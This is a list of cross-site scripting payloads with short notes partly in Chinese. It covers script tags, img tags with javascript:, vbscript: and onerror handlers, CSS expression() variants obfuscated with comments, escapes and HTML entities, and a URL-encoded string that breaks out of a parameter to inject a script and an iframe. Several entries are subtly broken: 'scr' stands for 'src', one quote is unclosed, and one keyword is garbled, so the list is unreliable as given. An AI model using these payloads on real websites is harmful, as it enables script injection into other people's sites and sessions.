<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["